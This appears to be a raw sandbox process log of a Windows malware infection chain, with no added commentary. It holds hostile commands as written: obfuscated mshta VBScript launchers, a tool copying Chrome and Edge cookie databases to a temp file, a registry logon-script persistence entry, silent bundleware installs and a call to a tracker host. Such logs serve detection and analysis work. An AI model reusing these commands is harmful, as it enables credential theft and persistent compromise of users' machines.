C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Users\Admin\AppData\Roaming\7268927.exe
"C:\Users\Admin\AppData\Roaming\7268927.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "4IubBdzTDcB9wNt5L88OiOii.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 680 -ip 680
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 276
C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 288
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp" /SL5="$20328,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-LNOE4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LNOE4.tmp\Inlog.tmp" /SL5="$20392,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp" /SL5="$3039C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-GA0F5.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GA0F5.tmp\MediaBurner2.tmp" /SL5="$20334,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-HPVFQ.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-HPVFQ.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5188 -ip 5188
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\5597475.exe
"C:\Users\Admin\AppData\Roaming\5597475.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 292
C:\Users\Admin\AppData\Roaming\4402502.exe
"C:\Users\Admin\AppData\Roaming\4402502.exe"
C:\Users\Admin\AppData\Roaming\1532688.exe
"C:\Users\Admin\AppData\Roaming\1532688.exe"
C:\Users\Admin\AppData\Roaming\8084573.exe
"C:\Users\Admin\AppData\Roaming\8084573.exe"
C:\Users\Admin\AppData\Roaming\3067750.exe
"C:\Users\Admin\AppData\Roaming\3067750.exe"
C:\Users\Admin\AppData\Local\Temp\tmpA8B_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpA8B_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe
"C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe"
C:\Users\Admin\Documents\PVug0jmF2Eu5brLpRJvXd80e.exe
"C:\Users\Admin\Documents\PVug0jmF2Eu5brLpRJvXd80e.exe"
C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe
"C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe"
C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe
"C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe"
C:\Users\Admin\Documents\uguJFTpr2ecVg9tFI6_hZARF.exe
"C:\Users\Admin\Documents\uguJFTpr2ecVg9tFI6_hZARF.exe"
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
"C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe"
C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe
"C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe"
C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe
"C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe"
C:\Users\Admin\Documents\dSJ1DLp8BjVryE14P2zNmv2P.exe
"C:\Users\Admin\Documents\dSJ1DLp8BjVryE14P2zNmv2P.exe"
C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe
"C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe"
C:\Users\Admin\Documents\O1BpwHdvsKnYoUztJHZYVdgB.exe
"C:\Users\Admin\Documents\O1BpwHdvsKnYoUztJHZYVdgB.exe"
C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe
"C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp" /SL5="$10508,138429,56832,C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe"
C:\Users\Admin\Documents\L5KufeDyDc_0Xbqzjg48xHo9.exe
"C:\Users\Admin\Documents\L5KufeDyDc_0Xbqzjg48xHo9.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\CzJr35j0AgQKdDStn6LUHdGO.exe
"C:\Users\Admin\Documents\CzJr35j0AgQKdDStn6LUHdGO.exe"
C:\Users\Admin\Documents\TyKmaTLXXQxaR793W4KjPEoi.exe
"C:\Users\Admin\Documents\TyKmaTLXXQxaR793W4KjPEoi.exe"
C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe
"C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe"
C:\Users\Admin\Documents\YroXK6C6n11mNO4Za0OdPbQ4.exe
"C:\Users\Admin\Documents\YroXK6C6n11mNO4Za0OdPbQ4.exe"
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
"C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe"
C:\Users\Admin\Documents\enCHWnnm4x73H0AymPSbZMk_.exe
"C:\Users\Admin\Documents\enCHWnnm4x73H0AymPSbZMk_.exe"
C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe
"C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe"
C:\Users\Admin\Documents\rY4B02mFx7NsjTURuMXhJ5V5.exe
"C:\Users\Admin\Documents\rY4B02mFx7NsjTURuMXhJ5V5.exe"
C:\Users\Admin\Documents\jNnYNY2SNFMOQI8N7SNnyWE9.exe
"C:\Users\Admin\Documents\jNnYNY2SNFMOQI8N7SNnyWE9.exe"
C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe
"C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\_WMhMST71Jr3oHV36_l5VqlX.exe
"C:\Users\Admin\Documents\_WMhMST71Jr3oHV36_l5VqlX.exe"
C:\Users\Admin\Documents\A6o6pZTNBojODUhHSWTXq0vu.exe
"C:\Users\Admin\Documents\A6o6pZTNBojODUhHSWTXq0vu.exe"
C:\Users\Admin\Documents\CG_WBckl49PYaVOZVSSrFc3b.exe
"C:\Users\Admin\Documents\CG_WBckl49PYaVOZVSSrFc3b.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5504 -ip 5504
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6188 -ip 6188
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "knGF2FT1BmSogNGvLPrQyPnY.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 1300 -ip 1300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 1768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 316
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\7413.exe
C:\Users\Admin\AppData\Local\Temp\7413.exe
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4672 -ip 4672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6992 -ip 6992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7112 -ip 7112
C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7080 -ip 7080
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1300 -s 2324
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7096 -ip 7096
C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe
"C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 240
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe
"C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe" -q
C:\Users\Admin\AppData\Roaming\6630894.exe
"C:\Users\Admin\AppData\Roaming\6630894.exe"
C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1108 -ip 1108
C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe
"C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe"
C:\Users\Admin\AppData\Roaming\7948182.exe
"C:\Users\Admin\AppData\Roaming\7948182.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 296
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6824 -ip 6824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7088 -ip 7088
C:\Users\Admin\AppData\Roaming\6500067.exe
"C:\Users\Admin\AppData\Roaming\6500067.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7132 -ip 7132
C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp" /SL5="$20514,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Roaming\3770032.exe
"C:\Users\Admin\AppData\Roaming\3770032.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4704 -ip 4704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 296
C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\B95A.exe
C:\Users\Admin\AppData\Local\Temp\B95A.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7164 -ip 7164
C:\Users\Admin\AppData\Local\Temp\is-FANIM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FANIM.tmp\Setup.tmp" /SL5="$3056E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe" /silent /subid=720
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D914A202CE78B1478DC7C441E676384E C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 272
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B917B62520F6A96A8050695C65562489 C
C:\Users\Admin\AppData\Local\Temp\E26F.exe
C:\Users\Admin\AppData\Local\Temp\E26F.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 696 -p 5832 -ip 5832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7964 -ip 7964
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D012CEBDEE7A734B345142F4A1F0C333 C
C:\Users\Admin\AppData\Local\Temp\F8E6.exe
C:\Users\Admin\AppData\Local\Temp\F8E6.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5460 -ip 5460
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5832 -s 2376
C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe
"C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 452
C:\Users\Admin\AppData\Local\Temp\is-HITCF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HITCF.tmp\ultramediaburner.tmp" /SL5="$70216,281924,62464,C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\d1-69593-e12-f878d-e017d54fdd784\Bemekiqeve.exe
"C:\Users\Admin\AppData\Local\Temp\d1-69593-e12-f878d-e017d54fdd784\Bemekiqeve.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 292
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\bb-ab8d1-525-161a0-0ed2c497473b0\Syzhugurope.exe
"C:\Users\Admin\AppData\Local\Temp\bb-ab8d1-525-161a0-0ed2c497473b0\Syzhugurope.exe"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Program Files\Windows Defender\mpcmdrun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Users\Admin\AppData\Local\Temp\248B.exe
C:\Users\Admin\AppData\Local\Temp\248B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5448 -ip 5448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 2428
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26119F7F8AA86AFC9A8AE19F3470B7C5
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\3C4A.exe
C:\Users\Admin\AppData\Local\Temp\3C4A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5072 -ip 5072
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4540 -s 2376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 292
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
